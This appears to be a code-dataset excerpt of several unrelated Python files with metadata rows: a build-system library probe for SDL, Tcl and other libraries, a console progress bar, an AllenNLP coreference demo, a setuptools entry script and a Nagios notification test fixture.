staticLibsOption = '--static-libs'
function = 'SDL_Init'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class SDL_ttf(Library):
libName = 'SDL_ttf'
makeName = 'SDL_TTF'
header = '<SDL_ttf.h>'
function = 'TTF_OpenFont'
dependsOn = ('SDL', 'FREETYPE')
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
version = cmd.expand(log, cls.getHeaders(platform),
'SDL_TTF_MAJOR_VERSION',
'SDL_TTF_MINOR_VERSION',
'SDL_TTF_PATCHLEVEL',
)
return None if None in version else '%s.%s.%s' % version
return execute
class TCL(Library):
libName = 'tcl'
makeName = 'TCL'
header = '<tcl.h>'
function = 'Tcl_CreateInterp'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android',)
@classmethod
def getTclConfig(cls, platform, distroRoot):
'''Tcl has a config script that is unlike the typical lib-config script.
Information is gathered by sourcing the config script, instead of
executing it and capturing the queried value from stdout. This script
is located in a library directory, not in a directory in the PATH.
Also, it does not have the executable bit set.
This method returns the location of the Tcl config script, or None if
it could not be found.
'''
if hasattr(cls, 'tclConfig'):
# Return cached value.
return cls.tclConfig
def iterLocations():
if platform == 'android':
# Under Android, the tcl set-up apparently differs from
# other cross-platform setups. the search algorithm to find the
# directory that will contain the tclConfig.sh script and the shared libs
# is not applicable to Android. Instead, immediately return the correct
# subdirectories to the routine that invokes iterLocations()
sdl_android_port_path = environ['SDL_ANDROID_PORT_PATH']
libpath = sdl_android_port_path + '/project/libs/armeabi'
yield libpath
tclpath = sdl_android_port_path + '/project/jni/tcl8.5/unix'
yield tclpath
else:
if distroRoot is None or cls.isSystemLibrary(platform):
roots = ('/usr/local', '/usr')
else:
roots = (distroRoot, )
for root in roots:
if isdir(root):
for libdir in ('lib', 'lib64', 'lib/tcl'):
libpath = root + '/' + libdir
if isdir(libpath):
yield libpath
for entry in listdir(libpath):
if entry.startswith('tcl8.'):
tclpath = libpath + '/' + entry
if isdir(tclpath):
yield tclpath
tclConfigs = {}
log = open('derived/tcl-search.log', 'w')
print >> log, 'Looking for Tcl...'
try:
for location in iterLocations():
path = location + '/tclConfig.sh'
if isfile(path):
print >> log, 'Config script:', path
text = captureStdout(
log,
"sh -c '. %s && echo %s'" % (
path, '$TCL_MAJOR_VERSION $TCL_MINOR_VERSION'
)
)
if text is not None:
try:
# pylint: disable-msg=E1103
major, minor = text.split()
version = int(major), int(minor)
except ValueError:
pass
else:
print >> log, 'Found: version %d.%d' % version
tclConfigs[path] = version
try:
# Minimum required version is 8.5.
# Pick the oldest possible version to minimize the risk of
# running into incompatible changes.
tclConfig = min(
( version, path )
for path, version in tclConfigs.iteritems()
if version >= (8, 5)
)[1]
except ValueError:
tclConfig = None
print >> log, 'No suitable versions found.'
else:
print >> log, 'Selected:', tclConfig
finally:
log.close()
cls.tclConfig = tclConfig
return tclConfig
@classmethod
def evalTclConfigExpr(cls, platform, distroRoot, expr, description):
tclConfig = cls.getTclConfig(platform, distroRoot)
if tclConfig is None:
return None
log = open('derived/tcl-search.log', 'a')
try:
print >> log, 'Getting Tcl %s...' % description
text = captureStdout(
log,
shjoin([
'sh', '-c',
'. %s && eval "echo \\"%s\\""' % (tclConfig, expr)
])
)
if text is not None:
print >> log, 'Result: %s' % text.strip()
finally:
log.close()
return None if text is None else text.strip()
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
# Use the current ANDROID cross-compilation flags and not the TCL flags. Otherwise, the
# wrong version of libstdc++ will end-up on the include path; the minimal Android NDK
# version instead of the more complete GNU version. This is because TCL for Android has
# been configured with the minimal libstdc++ on the include path in the C(XX) flags and
# not with the more complete GNU version
return environ['ANDROID_CXXFLAGS']
wantShared = not linkStatic or cls.isSystemLibrary(platform)
# The -DSTATIC_BUILD is a hack to avoid including the complete
# TCL_DEFS (see 9f1dbddda2) but still being able to link on
# MinGW (tcl.h depends on this being defined properly).
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_INCLUDE_SPEC}' + ('' if wantShared else ' -DSTATIC_BUILD'),
'compile flags'
)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
# Use the current ANDROID cross-compilation flags and not the TCL flags to
# prevent issues with libstdc++ version. See also getCompileFlags()
return environ['ANDROID_LDFLAGS']
# Tcl can be built as a shared or as a static library, but not both.
# Check whether the library type of Tcl matches the one we want.
wantShared = not linkStatic or cls.isSystemLibrary(platform)
tclShared = cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_SHARED_BUILD}',
'library type (shared/static)'
)
log = open('derived/tcl-search.log', 'a')
try:
if tclShared == '0':
if wantShared:
print >> log, (
'Dynamic linking requested, but Tcl installation has '
'static library.'
)
return None
elif tclShared == '1':
if not wantShared:
print >> log, (
'Static linking requested, but Tcl installation has '
'dynamic library.'
)
return None
else:
print >> log, (
'Unable to determine whether Tcl installation has '
'shared or static library.'
)
return None
finally:
log.close()
# Now get the link flags.
if wantShared:
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_LIB_SPEC}',
'dynamic link flags'
)
else:
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_EXEC_PREFIX}/lib/${TCL_LIB_FILE} ${TCL_LIBS}',
'static link flags'
)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_MAJOR_VERSION}.${TCL_MINOR_VERSION}${TCL_PATCH_LEVEL}',
'version'
)
class Theora(Library):
libName = 'theoradec'
makeName = 'THEORA'
header = '<theora/theoradec.h>'
function = 'th_decode_ycbcr_out'
dependsOn = ('OGG', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class Vorbis(Library):
libName = 'vorbis'
makeName = 'VORBIS'
header = '<vorbis/codec.h>'
function = 'vorbis_synthesis_pcmout'
dependsOn = ('OGG', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class ZLib(Library):
libName = 'z'
makeName = 'ZLIB'
header = '<zlib.h>'
function = 'inflate'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
version = cmd.expand(log, cls.getHeaders(platform), 'ZLIB_VERSION')
return None if version is None else version.strip('"')
return execute
# Build a dictionary of libraries using introspection.
def _discoverLibraries(localObjects):
for obj in localObjects:
if isinstance(obj, type) and issubclass(obj, Library):
if not (obj is Library):
yield obj.makeName, obj
librariesByName = dict(_discoverLibraries(locals().itervalues()))
def allDependencies(makeNames):
'''Compute the set of all directly and indirectly required libraries to
build and use the given set of libraries.
Returns the make names of the required libraries.
'''
# Compute the reflexive-transitive closure.
transLibs = set()
newLibs = set(makeNames)
while newLibs:
transLibs.update(newLibs)
newLibs = set(
depMakeName
for makeName in newLibs
for depMakeName in librariesByName[makeName].dependsOn
if depMakeName not in transLibs
)
return transLibs
| 29.937605 | 92 | 0.694756 |
from executils import captureStdout, shjoin
from os import listdir
from os.path import isdir, isfile
from os import environ
class Library(object):
libName = None
makeName = None
header = None
configScriptName = None
dynamicLibsOption = '--libs'
staticLibsOption = None
function = None
dependsOn = ()
@classmethod
def isSystemLibrary(cls, platform):
return False
@classmethod
def getConfigScript(
cls, platform, linkStatic, distroRoot
):
scriptName = cls.configScriptName
if scriptName is None:
return None
elif platform == 'dingux' and cls.isSystemLibrary(platform):
return '/opt/a320-toolchain/usr/mipsel-a320-linux-uclibc/sysroot/usr/bin/%s' % scriptName
elif distroRoot is None:
return scriptName
else:
return '%s/bin/%s' % (distroRoot, scriptName)
@classmethod
def getHeaders(cls, platform):
header = cls.header
return header if hasattr(header, '__iter__') else (header, )
@classmethod
def getLibName(cls, platform):
return cls.libName
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_CXXFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
flags = [ '`%s --cflags`' % configScript ]
elif distroRoot is None or cls.isSystemLibrary(platform):
flags = []
else:
flags = [ '-I%s/include' % distroRoot ]
dependentFlags = [
librariesByName[name].getCompileFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
return ' '.join(flags + dependentFlags)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_LDFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
libsOption = (
cls.dynamicLibsOption
if not linkStatic or cls.isSystemLibrary(platform)
else cls.staticLibsOption
)
if libsOption is not None:
return '`%s %s`' % (configScript, libsOption)
if distroRoot is None or cls.isSystemLibrary(platform):
return '-l%s' % cls.getLibName(platform)
else:
flags = [
'%s/lib/lib%s.a' % (distroRoot, cls.getLibName(platform))
] if linkStatic else [
'-L%s/lib -l%s' % (distroRoot, cls.getLibName(platform))
]
dependentFlags = [
librariesByName[name].getLinkFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
systemDependentFlags = list(cls.getSystemDependentFlags(platform))
return ' '.join(flags + dependentFlags + systemDependentFlags)
@classmethod
def getSystemDependentFlags(cls, platform):
return ()
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is None:
return 'unknown'
else:
return '`%s --version`' % configScript
class FreeType(Library):
libName = 'freetype'
makeName = 'FREETYPE'
header = ('<ft2build.h>', 'FT_FREETYPE_H')
configScriptName = 'freetype-config'
function = 'FT_Open_Face'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getConfigScript(cls, platform, linkStatic, distroRoot):
if platform in ('netbsd', 'openbsd'):
if distroRoot == '/usr/local':
distroRoot = '/usr/X11R6'
return super(FreeType, cls).getConfigScript(
platform, linkStatic, distroRoot
)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
return '`%s --ftversion`' % configScript
class GL(Library):
libName = 'GL'
makeName = 'GL'
function = 'glGenTextures'
@classmethod
def isSystemLibrary(cls, platform):
return not platform.endswith('bsd')
@classmethod
def getHeaders(cls, platform):
if platform == 'darwin':
return ('<OpenGL/gl.h>', )
else:
return ('<GL/gl.h>', )
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform in ('netbsd', 'openbsd'):
return '-I/usr/X11R6/include -I/usr/X11R7/include'
else:
return super(GL, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'darwin':
return '-framework OpenGL'
elif platform.startswith('mingw'):
return '-lopengl32'
elif platform in ('netbsd', 'openbsd'):
return '-L/usr/X11R6/lib -L/usr/X11R7/lib -lGL'
else:
return super(GL, cls).getLinkFlags(platform, linkStatic, distroRoot)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
versionPairs = tuple(
( major, minor )
for major in range(1, 10)
for minor in range(0, 10)
)
version = cmd.expand(log, cls.getHeaders(platform), *(
'GL_VERSION_%d_%d' % pair for pair in versionPairs
))
try:
return '%d.%d' % max(
ver
for ver, exp in zip(versionPairs, version)
if exp is not None
)
except ValueError:
return None
return execute
class GLEW(Library):
makeName = 'GLEW'
header = '<GL/glew.h>'
function = 'glewInit'
dependsOn = ('GL', )
@classmethod
def getLibName(cls, platform):
if platform.startswith('mingw'):
return 'glew32'
else:
return 'GLEW'
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
flags = super(GLEW, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
if platform.startswith('mingw') and linkStatic:
return '%s -DGLEW_STATIC' % flags
else:
return flags
class LibPNG(Library):
libName = 'png12'
makeName = 'PNG'
header = '<png.h>'
configScriptName = 'libpng-config'
dynamicLibsOption = '--ldflags'
function = 'png_write_image'
dependsOn = ('ZLIB', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class LibXML2(Library):
libName = 'xml2'
makeName = 'XML'
header = '<libxml/parser.h>'
configScriptName = 'xml2-config'
function = 'xmlParseDocument'
dependsOn = ('ZLIB', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android',)
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
flags = super(LibXML2, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
if not linkStatic or cls.isSystemLibrary(platform):
return flags
else:
return flags + ' -DLIBXML_STATIC'
class OGG(Library):
libName = 'ogg'
makeName = 'OGG'
header = '<ogg/ogg.h>'
function = 'ogg_stream_init'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class SDL(Library):
libName = 'SDL'
makeName = 'SDL'
header = '<SDL.h>'
configScriptName = 'sdl-config'
staticLibsOption = '--static-libs'
function = 'SDL_Init'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class SDL_ttf(Library):
libName = 'SDL_ttf'
makeName = 'SDL_TTF'
header = '<SDL_ttf.h>'
function = 'TTF_OpenFont'
dependsOn = ('SDL', 'FREETYPE')
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
version = cmd.expand(log, cls.getHeaders(platform),
'SDL_TTF_MAJOR_VERSION',
'SDL_TTF_MINOR_VERSION',
'SDL_TTF_PATCHLEVEL',
)
return None if None in version else '%s.%s.%s' % version
return execute
class TCL(Library):
libName = 'tcl'
makeName = 'TCL'
header = '<tcl.h>'
function = 'Tcl_CreateInterp'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android',)
@classmethod
def getTclConfig(cls, platform, distroRoot):
if hasattr(cls, 'tclConfig'):
return cls.tclConfig
def iterLocations():
if platform == 'android':
sdl_android_port_path = environ['SDL_ANDROID_PORT_PATH']
libpath = sdl_android_port_path + '/project/libs/armeabi'
yield libpath
tclpath = sdl_android_port_path + '/project/jni/tcl8.5/unix'
yield tclpath
else:
if distroRoot is None or cls.isSystemLibrary(platform):
roots = ('/usr/local', '/usr')
else:
roots = (distroRoot, )
for root in roots:
if isdir(root):
for libdir in ('lib', 'lib64', 'lib/tcl'):
libpath = root + '/' + libdir
if isdir(libpath):
yield libpath
for entry in listdir(libpath):
if entry.startswith('tcl8.'):
tclpath = libpath + '/' + entry
if isdir(tclpath):
yield tclpath
tclConfigs = {}
log = open('derived/tcl-search.log', 'w')
print >> log, 'Looking for Tcl...'
try:
for location in iterLocations():
path = location + '/tclConfig.sh'
if isfile(path):
print >> log, 'Config script:', path
text = captureStdout(
log,
"sh -c '. %s && echo %s'" % (
path, '$TCL_MAJOR_VERSION $TCL_MINOR_VERSION'
)
)
if text is not None:
try:
major, minor = text.split()
version = int(major), int(minor)
except ValueError:
pass
else:
print >> log, 'Found: version %d.%d' % version
tclConfigs[path] = version
try:
tclConfig = min(
( version, path )
for path, version in tclConfigs.iteritems()
if version >= (8, 5)
)[1]
except ValueError:
tclConfig = None
print >> log, 'No suitable versions found.'
else:
print >> log, 'Selected:', tclConfig
finally:
log.close()
cls.tclConfig = tclConfig
return tclConfig
@classmethod
def evalTclConfigExpr(cls, platform, distroRoot, expr, description):
tclConfig = cls.getTclConfig(platform, distroRoot)
if tclConfig is None:
return None
log = open('derived/tcl-search.log', 'a')
try:
print >> log, 'Getting Tcl %s...' % description
text = captureStdout(
log,
shjoin([
'sh', '-c',
'. %s && eval "echo \\"%s\\""' % (tclConfig, expr)
])
)
if text is not None:
print >> log, 'Result: %s' % text.strip()
finally:
log.close()
return None if text is None else text.strip()
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_CXXFLAGS']
wantShared = not linkStatic or cls.isSystemLibrary(platform)
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_INCLUDE_SPEC}' + ('' if wantShared else ' -DSTATIC_BUILD'),
'compile flags'
)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_LDFLAGS']
wantShared = not linkStatic or cls.isSystemLibrary(platform)
tclShared = cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_SHARED_BUILD}',
'library type (shared/static)'
)
log = open('derived/tcl-search.log', 'a')
try:
if tclShared == '0':
if wantShared:
print >> log, (
'Dynamic linking requested, but Tcl installation has '
'static library.'
)
return None
elif tclShared == '1':
if not wantShared:
print >> log, (
'Static linking requested, but Tcl installation has '
'dynamic library.'
)
return None
else:
print >> log, (
'Unable to determine whether Tcl installation has '
'shared or static library.'
)
return None
finally:
log.close()
if wantShared:
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_LIB_SPEC}',
'dynamic link flags'
)
else:
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_EXEC_PREFIX}/lib/${TCL_LIB_FILE} ${TCL_LIBS}',
'static link flags'
)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_MAJOR_VERSION}.${TCL_MINOR_VERSION}${TCL_PATCH_LEVEL}',
'version'
)
class Theora(Library):
libName = 'theoradec'
makeName = 'THEORA'
header = '<theora/theoradec.h>'
function = 'th_decode_ycbcr_out'
dependsOn = ('OGG', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class Vorbis(Library):
libName = 'vorbis'
makeName = 'VORBIS'
header = '<vorbis/codec.h>'
function = 'vorbis_synthesis_pcmout'
dependsOn = ('OGG', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class ZLib(Library):
libName = 'z'
makeName = 'ZLIB'
header = '<zlib.h>'
function = 'inflate'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
version = cmd.expand(log, cls.getHeaders(platform), 'ZLIB_VERSION')
return None if version is None else version.strip('"')
return execute
# Build a dictionary of libraries using introspection.
def _discoverLibraries(localObjects):
for obj in localObjects:
if isinstance(obj, type) and issubclass(obj, Library):
if not (obj is Library):
yield obj.makeName, obj
librariesByName = dict(_discoverLibraries(locals().itervalues()))
def allDependencies(makeNames):
# Compute the reflexive-transitive closure.
transLibs = set()
newLibs = set(makeNames)
while newLibs:
transLibs.update(newLibs)
newLibs = set(
depMakeName
for makeName in newLibs
for depMakeName in librariesByName[makeName].dependsOn
if depMakeName not in transLibs
)
return transLibs
| true | true |
f72ec2738fdcaa32e93f95407b764fa52d3f3f71 | 598 | py | Python | lixian_progress.py | 1py/xunlei-lixian | 1881932b9d5ccba78c7788fbad12982e05bf7f86 | [
"MIT"
] | 2,177 | 2015-01-02T09:56:51.000Z | 2022-03-27T01:48:37.000Z | lixian_progress.py | 1py/xunlei-lixian | 1881932b9d5ccba78c7788fbad12982e05bf7f86 | [
"MIT"
] | 29 | 2015-01-24T17:38:59.000Z | 2021-08-29T03:39:30.000Z | lixian_progress.py | 1py/xunlei-lixian | 1881932b9d5ccba78c7788fbad12982e05bf7f86 | [
"MIT"
] | 516 | 2015-01-02T18:48:29.000Z | 2022-01-26T07:12:35.000Z |
import sys
class SimpleProgressBar:
def __init__(self):
self.displayed = False
def update(self, percent):
self.displayed = True
bar_size = 40
percent *= 100.0
if percent > 100:
percent = 100.0
dots = int(bar_size * percent / 100)
plus = percent / 100 * bar_size - dots
if plus > 0.8:
plus = '='
elif plus > 0.4:
plus = '-'
else:
plus = ''
percent = int(percent)
bar = '=' * dots + plus
bar = '{0:>3}%[{1:<40}]'.format(percent, bar)
sys.stdout.write('\r'+bar)
sys.stdout.flush()
def done(self):
if self.displayed:
print
self.displayed = False
| 19.290323 | 47 | 0.607023 |
import sys
class SimpleProgressBar:
def __init__(self):
self.displayed = False
def update(self, percent):
self.displayed = True
bar_size = 40
percent *= 100.0
if percent > 100:
percent = 100.0
dots = int(bar_size * percent / 100)
plus = percent / 100 * bar_size - dots
if plus > 0.8:
plus = '='
elif plus > 0.4:
plus = '-'
else:
plus = ''
percent = int(percent)
bar = '=' * dots + plus
bar = '{0:>3}%[{1:<40}]'.format(percent, bar)
sys.stdout.write('\r'+bar)
sys.stdout.flush()
def done(self):
if self.displayed:
print
self.displayed = False
| true | true |
f72ec42eb3efc0949d13fb798398c8eed884a8bb | 2,368 | py | Python | triplet_to_text/code_/coreference_resolver/allennlp_coreference_resolution.py | kracr/OntoLearnBench | c1ca89acd6862fcd6954a62d83c43b2236cdc695 | [
"Apache-2.0"
] | 1 | 2022-02-11T19:36:40.000Z | 2022-02-11T19:36:40.000Z | triplet_to_text/code_/coreference_resolver/allennlp_coreference_resolution.py | kracr/OntoLearnBench | c1ca89acd6862fcd6954a62d83c43b2236cdc695 | [
"Apache-2.0"
] | null | null | null | triplet_to_text/code_/coreference_resolver/allennlp_coreference_resolution.py | kracr/OntoLearnBench | c1ca89acd6862fcd6954a62d83c43b2236cdc695 | [
"Apache-2.0"
] | 1 | 2021-06-08T18:54:40.000Z | 2021-06-08T18:54:40.000Z | #!/usr/bin/env python
# coding: utf-8
# In[1]:
from allennlp.predictors.predictor import Predictor
# ## Instantiate AllenNLP `Predictor`
# 1. Load the same model that is used in the [demo](https://demo.allennlp.org/coreference-resolution) (*don't get alarmed by the warning - we don't need to fine-tune the model to use it*).
# 2. Get the prediction :)
# In[2]:
model_url = 'https://storage.googleapis.com/allennlp-public-models/coref-spanbert-large-2020.02.27.tar.gz'
predictor = Predictor.from_path(model_url)
# In[3]:
text = "Eva and Martha didn't want their friend Jenny to feel lonely so they invited her to the party in Las Vegas."
prediction = predictor.predict(document=text)
# ## Coreference resolution with `Allen Institute`
# What we get as a result (`prediction`) is a dictionary as Allen outputs multiple different information at once.
# The ones that we found to be using the most are:
#
# | Key | Type | Description
# |:--------------------------|:-------------------|:----------------------------------------------------
# | `top_spans` | `List[List[int]]` | List of `spaCy` token indices pairs representing spans
# | `document` | `List[str]` | Document's tokens (from `spaCy`; but represented as string not Token)
# | `clusters` | `List[List[List[int]]]` | Clusters of spans (represented by token indices pairs)
# In[4]:
# it's our original text (with extra whitespaces as we trivialy just joined tokens with ' ')
' '.join(prediction['document'])
# In[5]:
# and the found clusters - however, they are not easily understood...
prediction['clusters']
# In[6]:
# but that's how it looks after coreference resolution (notice the possessive!)
predictor.coref_resolved(text)
# As Allen's coreference resolution `Predictor` has quite a limited number of functionalities, in order to turn its output to a more readable one, we need to manually write some functions:
# In[7]:
def get_span_words(span, document):
return ' '.join(document[span[0]:span[1]+1])
def print_clusters(prediction):
document, clusters = prediction['document'], prediction['clusters']
for cluster in clusters:
print(get_span_words(cluster[0], document) + ': ', end='')
print(f"[{'; '.join([get_span_words(span, document) for span in cluster])}]")
# In[8]:
print_clusters(prediction)
| 29.234568 | 188 | 0.669341 |
from allennlp.predictors.predictor import Predictor
odels/coref-spanbert-large-2020.02.27.tar.gz'
predictor = Predictor.from_path(model_url)
text = "Eva and Martha didn't want their friend Jenny to feel lonely so they invited her to the party in Las Vegas."
prediction = predictor.predict(document=text)
# ## Coreference resolution with `Allen Institute`
# What we get as a result (`prediction`) is a dictionary as Allen outputs multiple different information at once.
# The ones that we found to be using the most are:
#
# | Key | Type | Description
# |:--------------------------|:-------------------|:----------------------------------------------------
# | `top_spans` | `List[List[int]]` | List of `spaCy` token indices pairs representing spans
# | `document` | `List[str]` | Document's tokens (from `spaCy`; but represented as string not Token)
' '.join(prediction['document'])
# In[5]:
# and the found clusters - however, they are not easily understood...
prediction['clusters']
# In[6]:
# but that's how it looks after coreference resolution (notice the possessive!)
predictor.coref_resolved(text)
# In[7]:
def get_span_words(span, document):
return ' '.join(document[span[0]:span[1]+1])
def print_clusters(prediction):
document, clusters = prediction['document'], prediction['clusters']
for cluster in clusters:
print(get_span_words(cluster[0], document) + ': ', end='')
print(f"[{'; '.join([get_span_words(span, document) for span in cluster])}]")
# In[8]:
print_clusters(prediction)
| true | true |
f72ec4c3bf5925d67bf0defaf42a32236624789c | 1,002 | py | Python | venv/Scripts/futurize-script.py | saurabhjha137/OCR_using_tesseract | d852865086a7a104f74866411058e51f407b5f6c | [
"Apache-1.1"
] | null | null | null | venv/Scripts/futurize-script.py | saurabhjha137/OCR_using_tesseract | d852865086a7a104f74866411058e51f407b5f6c | [
"Apache-1.1"
] | null | null | null | venv/Scripts/futurize-script.py | saurabhjha137/OCR_using_tesseract | d852865086a7a104f74866411058e51f407b5f6c | [
"Apache-1.1"
] | null | null | null | #!"f:\opencv projects\tesseract ocr\venv\scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'future==0.18.2','console_scripts','futurize'
import re
import sys
# for compatibility with easy_install; see #2198
__requires__ = 'future==0.18.2'
try:
from importlib.metadata import distribution
except ImportError:
try:
from importlib_metadata import distribution
except ImportError:
from pkg_resources import load_entry_point
def importlib_load_entry_point(spec, group, name):
dist_name, _, _ = spec.partition('==')
matches = (
entry_point
for entry_point in distribution(dist_name).entry_points
if entry_point.group == group and entry_point.name == name
)
return next(matches).load()
globals().setdefault('load_entry_point', importlib_load_entry_point)
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(load_entry_point('future==0.18.2', 'console_scripts', 'futurize')())
| 29.470588 | 81 | 0.702595 |
import re
import sys
quires__ = 'future==0.18.2'
try:
from importlib.metadata import distribution
except ImportError:
try:
from importlib_metadata import distribution
except ImportError:
from pkg_resources import load_entry_point
def importlib_load_entry_point(spec, group, name):
dist_name, _, _ = spec.partition('==')
matches = (
entry_point
for entry_point in distribution(dist_name).entry_points
if entry_point.group == group and entry_point.name == name
)
return next(matches).load()
globals().setdefault('load_entry_point', importlib_load_entry_point)
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(load_entry_point('future==0.18.2', 'console_scripts', 'futurize')())
| true | true |
f72ec7cea5ff8e51a73eb0ada22fc04b55636c4f | 9,232 | py | Python | python/nagcat/unittests/test_notify.py | marineam/nagcat | 445d0efe1fb2ec93c31d1f9d8fa0c0563189ffaf | [
"Apache-2.0"
] | null | null | null | python/nagcat/unittests/test_notify.py | marineam/nagcat | 445d0efe1fb2ec93c31d1f9d8fa0c0563189ffaf | [
"Apache-2.0"
] | null | null | null | python/nagcat/unittests/test_notify.py | marineam/nagcat | 445d0efe1fb2ec93c31d1f9d8fa0c0563189ffaf | [
"Apache-2.0"
] | null | null | null | # Copyright 2010 ITA Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from twisted.trial import unittest
from nagcat import notify
import coil
ENVIRONMENT_HOST = {
# Host Macros
'NAGIOS_HOSTNAME': "localhost",
'NAGIOS_HOSTDISPLAYNAME': "localhost",
'NAGIOS_HOSTALIAS': "localhost",
'NAGIOS_HOSTADDRESS': "127.0.0.1",
'NAGIOS_HOSTSTATE': "UP",
'NAGIOS_HOSTSTATEID': "0",
'NAGIOS_LASTHOSTSTATE': "UP",
'NAGIOS_LASTHOSTSTATEID': "0",
'NAGIOS_HOSTSTATETYPE': "HARD",
'NAGIOS_HOSTATTEMPT': "1",
'NAGIOS_MAXHOSTATTEMPTS': "3",
'NAGIOS_HOSTEVENTID': "0",
'NAGIOS_LASTHOSTEVENTID': "0",
'NAGIOS_HOSTPROBLEMID': "0",
'NAGIOS_LASTHOSTPROBLEMID': "0",
'NAGIOS_HOSTLATENCY': "0.123",
'NAGIOS_HOSTEXECUTIONTIME': "4.012",
'NAGIOS_HOSTDURATION': "35d 15h 31m 49s",
'NAGIOS_HOSTDURATIONSEC': "3079909",
'NAGIOS_HOSTDOWNTIME': "0",
'NAGIOS_HOSTPERCENTCHANGE': "0.0",
'NAGIOS_HOSTGROUPNAMES': "a_group,b_group",
'NAGIOS_LASTHOSTCHECK': "1260009929",
'NAGIOS_LASTHOSTSTATECHANGE': "1256929950",
'NAGIOS_LASTHOSTUP': "1260009939",
'NAGIOS_LASTHOSTDOWN': "0",
'NAGIOS_LASTHOSTUNREACHABLE': "0",
'NAGIOS_HOSTOUTPUT': "PING OK - Packet loss = 0%, RTA = 2.00 ms",
'NAGIOS_LONGHOSTOUTPUT': "",
'NAGIOS_HOSTPERFDATA': "rta=10.778000ms;3000.000000;5000.000000;0.000000 pl=0%;80;100;0",
'NAGIOS_HOSTCHECKCOMMAND': "check_host_alive",
'NAGIOS_HOSTACTIONURL': "",
'NAGIOS_HOSTNOTESURL': "",
'NAGIOS_HOSTNOTES': "",
'NAGIOS_TOTALHOSTSERVICES': "39",
'NAGIOS_TOTALHOSTSERVICESOK': "38",
'NAGIOS_TOTALHOSTSERVICESWARNING': "0",
'NAGIOS_TOTALHOSTSERVICESCRITICAL': "1",
'NAGIOS_TOTALHOSTSERVICESUNKNOWN': "0",
# Host Group Macros
'NAGIOS_HOSTGROUPNAME': "a_group",
'NAGIOS_HOSTGROUPALIAS': "A Group",
'NAGIOS_HOSTGROUPMEMBERS': "localhost",
'NAGIOS_HOSTGROUPNOTES': "",
'NAGIOS_HOSTGROUPNOTESURL': "",
'NAGIOS_HOSTGROUPACTIONURL': "",
# Contact Macros
